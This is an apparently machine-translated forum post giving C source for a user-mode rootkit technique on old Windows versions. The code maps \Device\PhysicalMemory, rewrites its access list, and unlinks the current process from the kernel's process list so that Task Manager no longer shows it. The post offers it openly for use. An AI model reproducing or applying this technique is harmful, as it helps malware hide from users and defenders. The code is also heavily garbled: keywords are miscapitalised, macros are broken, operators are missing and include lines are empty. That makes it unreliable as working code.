The hidden process based on Hook ZwQuerySystemInformation is done in the drive mode, and here is implemented by operating memory. And reach the versatility of different system versions. Power ... From the driving development network ... Suitable for us to drive idiot ^ _ ^
Note: During the test process. Because it is a command line mode, it is actually hidden in the process in the process of the task manager ... Other yourself change ...
Here is the source code:
#include
#include
#include
#include
#include
#include
#include
#define nt_success (status) (status)> = 0)
#DEFINE STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)
#define status_access_denied ((ntstatus) 0xc0000022L)
TypedEf long NTSTATUS;
Typedef struct _io_status_block
{
NTSTATUS STATUS;
Ulong information;
} }_Status_block, * pio_status_block;
Typedef struct _unicate_string
{
Ushort Length;
Ushort maximumlength;
PWSTR BUFFER;
} Unicode_string, * punicode_string;
#define obj_inherit 0x00000002L
#define obj_pers_Permanent 0x00000010L
#define obj_exclusive 0x00000020L
#define obj_case_insensitive 0x00000040L
#define obj_openif 0x00000080L
#define obj_openlink 0x00000100L
#define obj_kernel_handle 0x00000200L
#define obj_valid_attributes 0x000003F2L
#DEFINE STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS) 0xC0000004L)
#define status_access_denied ((ntstatus) 0xc0000022L)
/ *
*********************************************************** **********************
* NTDDK.H
* /
TypedEf long NTSTATUS;
TypedEf Ulong Access_mask;
/ *
* NTDEF.H
*********************************************************** **********************
* /
/ *
*********************************************************** **********************
* << Windows NT / 2000 Native API Reference >> - Gary Nebbett
* /
Typedef enum _system_information_class
{
SystemHandleinFormation = 16} system_information_class;
/ *
* Information Class 16
* /
Typedef struct _system_handle_information
{
Ulong processid;
Uchar ObjectTypenumber;
Uchar flags;
Ushort handle;
PVOID Object;
Access_mask grantedAccess;
} System_handle_information, * psystem_handle_information;
#define InitializeObjectAttributes (p, n, a, r, s) {(p) -> length = sizeof (object_attributes); (P) -> rootdirectory = r; (p) -> attributes = a; (p) -> Objectname = n; (p) -> securityDescriptor = s; (p) -> securityQualityofService = null;}
/ *
*********************************************************** **********************
* << Windows NT / 2000 Native API Reference >> - Gary Nebbett
*********************************************************** **********************
* /
Typedef ulong (__stdcall * rtlntstatustodoserror) (in ntstatus status);
typedef NTSTATUS (__stdcall * ZWQUERYSYSTEMINFORMATION) (IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL);
/ ************************************************** **********************
* *
* Function Prototype *
* *
*********************************************************** ********************* /
Static DWORD GETEPROCESSFROMPID (ULONG PID);
Static Bool LocatedllenTry (Void);
/ ************************************************** **********************
* ** static global var *
* *
*********************************************************** ********************* /
Static RTLNTSTATASERROR RTLNTSTATASERROR = NULL;
STATIC ZWQUERYSYSTEMINFORMATION ZWQUERYSYSTEMINFORMATION = NULL;
Static hmodule hmodule = null;
/ ************************************************** ********************** /
Static DWORD GETEPROCESSFROMPID (ULONG PID)
{
NTSTATUS STATUS;
PVOID BUF = NULL;
Ulong size = 1;
Ulong Numofhandle = 0;
Ulong i;
Psystem_handle_information h_info = null;
for (size = 1; size * = 2)
{
IF (null == (buf = Calloc (size, 1))))
{
FPRINTF (stderr, "Calloc (% U, 1) Failed / N", size);
Goto geteprocessFromPid_exit;
}
Status = ZwQuerySystemInformation (SystemHandleinformation, BUF, SIZE, NULL);
IF (! NT_Success (status))
{
IF (status_info_length_mismatch == status)
{
Free (BUF);
BUF = NULL;
}
Else
{
Printf ("ZwQuerySystemInformation () failed");
Goto geteprocessFromPid_exit;
}
}
Else
{
Break;
}
} / * End of for * /
// Return to the buffer first is a ULong type data, indicating how many groups
Numofhandle = (ulong) BUF;
H_INFO = (psystem_handle_information) ((Ulong) BUF 4);
For (i = 0; i { IF ((h_info [i] .processid == pid) && (H_INFO [i] .ObjectTypenumber == 5)) // && (h_info [i] .handle == 0x3d8)) { Printf ("Handle: 0x% x, Object 0x% x / N / R", H_INFO [i] .handle, H_INFO [i] .Object); Return ((DWORD) (H_INFO [i] .Object); } } GeteprocessFromPid_exit: IF (buf! = NULL) { Free (BUF); BUF = NULL; } Return (False); } / * * NTDLL.DLL * / Static Bool LocatedllenTry (Void) { BOOL RET = FALSE; Char NTDLL_DLL [] = "ntdll.dll"; HModule NTDLL_DLL = NULL; IF ((NTDLL_DLL = getModuleHandle (NTDLL_DLL)) == NULL) { Printf ("GetModuleHandle () Failed"); Return (False); } IF (! (zwQuerySystemInformation) getProcadDress (NTDLL_DLL, ZWQUERYSYSTEMINFORMATION))))) { Goto LocatedllenTry_Exit; } Ret = true; LocatentdllenTry_exit: IF (false == RET) { PRINTF ("GetProcadDress () Failed"); } NTDLL_DLL = NULL; Return (RET); } Typedef struct _object_attributes { Ulong Length; Handle rootdirectory; Punicode_String ObjectName; Ulong attributes; PVOID SecurityDescriptor; Pvoid SecurityQualityOfService; } Object_attributes, * pobject_attribute; TypeDef NTSTATUS (Callback * ZWopense) ( Out phandle sectionhandle, IN Access_mask desidaccess, In POBJECT_ATTRIBUTES OBJECTATTRIBUTES ); Typedef void (Callback * RTLinitUnicodestring) In out dstinationstring, In Pcwstr SourceString ); RTLinitunicodeString RTLinitunicodeString; Zwopensection Zwopense; HModule g_hntdll = null; PVOID G_PMAPPHYSICALMORY = NULL; Handle g_hmpm = NULL; BOOL initntll () { g_hntdll = loadingLibrary ("ntdll.dll"); IF (! g_hntdll) { Return False; } RTLINITUNICODESTRING = (RTLinitunicodeString) GetProcaddress (g_hntdll, "rtLinitUnicodestring"); Zwopensection = (Zwopensection) GetProcaddress (g_hntdll, "zwopensection"); Return True; } Void Closentdll () { IF (g_hntdll! = null) { Freelibrary (g_hntdll); } } Void SetPhyscialMemorysectionCanbewrite (Handle Hsection) { PACL PDACL = NULL; PACL PNEWDACL = NULL; PSecurity_Descriptor PSD = NULL; DWORD DWRES; EXPLICIT_ACCESS EA; IF (dwres = getsecurityInfo (HSECTION, SE_KERNEL_Object, DACL_SECURITY_INFORMATION, NULL, NULL, & PDACL, NULL, & PSD)! = Error_Success { Goto cleanup; } ZeromeMory (& EA, SIZEOF (EXPLICIT_ACCESS)); Ea.grfaccesspermissions = section_map_write; Ea.grfaccessmode = GRANT_ACCESS; Ea.grfinheritance = no_inheritance; Ea.trustee.trusteeform = trustee_is_name; EA.TRUSTEE.TRUSTEETEETYPE = trustee_is_user; Ea.trustee.ptStrName = "current_user"; IF (dwres = setENTRIESINACL (1, & EA, PDACL, & PNEWDACL)! = Error_Success) { Goto cleanup; } IF (dwres = setsecurityInfo (hsection, se_kernel_object, dacl_security_information, null, null, pnewdacl, null)! = error_success { Goto cleanup; } Cleanup: IF (PSD) Localfree (PSD); IF (PNewDACL) LocalFree (PNewDACL); } Handle OpenPhysicalMemory () { NTSTATUS STATUS; Unicode_string physmemstring; Object_attributes attributes; RTLinitunicodeString (& PhysmemString, L "// device // physicalmemory); Attributes.Length = sizeof (Object_attributes); Attributes.rootdirectory = NULL; Attributes.Objectname = & physmemstring; Attributes.attributes = 0; attributes.securityDescriptor = null; Attributes.securityqualityofservice = null; Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes); IF (status == status_access_denied) { Status = zwopensection (& g_hmpm, read_control | write_dac, & attributes); SetPhyscialMemorySectionCanbewrite (g_hmpm); CloseHandle (G_HMPM); Status = zwopensection (& g_hmpm, section_map_read | section_map_write, & attributes); } IF (! NT_Success (status)) { Return NULL; } g_pmapphysicalmemory = mappviewoffile g_hmpm, 4, 0, 0x30000, 0x1000); IF (g_pmapphysicalmemory == null) { Return NULL; } Return G_HMPM; } Pvoid LineArtophys (Pulong Baseaddress, Pvoid Addr) { Ulong Vaddr = (Ulong) Addr, PGDE, PTE, PADDR IF (VADDR> = 0x80000000 && Vaddr <0xa0000000) { PADDR = VADDR-0x80000000; Return (PVOID) PADDR; } PGDE = BaseAddress [VADDR >> 22]; IF ((pgde & 1)! = 0) { Ulong TMP = PGDE & 0x00000080; IF (TMP! = 0) { Paddr = (PGDE & 0xFFC00000) (VADDR & 0x003FFFF); } Else { PGDE = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((pulong) PGDE [(VADDR & 0x003FF000) >> 12]; IF ((PTE & 1)! = 0) { PADDR = (PTE & 0xFfffff000) (VADDR & 0x00000FFF); UNMAPVIEWOFFILE ((pvoid) PGDE; } Else Return 0; } } Else Return 0; Return (PVOID) PADDR; } Ulong getData (PVOID ADDR) { Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr; Pulong TMP = (pulong) MapViewOffile (g_hmpm, 4, 0, phys & 0xffff000, 0x1000); IF (TMP == 0) Return 0; Ulong Ret = TMP [(Phys & 0xFFF) >> 2]; UNMAPVIEWOFFILE (TMP); RETURN RET; } Bool SetData (PVOID ADDR, ULONG DATA) { Ulong phys = (ulong) lineartophys ((pulong) g_pmapphysicalmemory, (pvoid) addr; Pulong TMP = (Pulong) MapViewOffile (g_hmpm, file_map_write, 0, phys & 0xffff000, 0x1000); IF (TMP == 0) Return False; TMP [(Phys & 0xFFF) >> 2] = DATA; UnmapViewoffile (TMP); Return True; } Bool hideprocessatall () { IF (initntdll ()) { Openphysicalmemory () == 0) { Return False; } INT F, B; OsversionInfo Osvi; Osvi.dwosversionInfosize = Sizeof (OSVI); GetVersionex (& OSVI); // f = 0x88; b = 0x8c; IF (Osvi.dwmajorversion == 5) { IF (Osvi.dwminorversion == 0) // Win2K { f = 0xA0; b = 0xA4; } Else if (Osvi.dwminorversion == 1) // WinXP { f = 0x88; b = 0x8c; } Else if (Osvi.dwminorVersion == 2) // Win2003 { F = 0x8a; b = 0x8e; } Else Return False; } Else if (Osvi.dwmajorversion == 4 && Osvi.dwminorversion == 0 && Osvi.dwplatformID == 2) // NT { f = 0x98; b = 0x9c; } Else Return False; // ulong thread = getdata (pvoid) 0xffdff124); // ulong process = getData ((pvoid) (Thread 0x22C); Locatentdllentry (); // Open your own handle, so you can find yourself in the Handle list, Process corresponds to ObjectTypenum 5 OpenProcess (Process_All_Access, false, getcurrentprocessid ()); Ulong process = (ulong) getEprocessFromPid ((DWORD) getCurrentProcessId ()); Ulong fw = getData (PVOID (Process F)); Ulong bw = getData (PVOID (Process B)); SetData (PVOID (FW 4), BW); SetDATA (PVOID (BW), FW); UNMAPVIEWOFFILE (g_pmapphysicalmemory); CloseHandle (G_HMPM); Closentdll (); } Return True; } Int main (int Argc, char * argv []) { HideProcessatall (); SLEEP (30 * 1000); Printf ("Hello World! / N"); Return 0; }
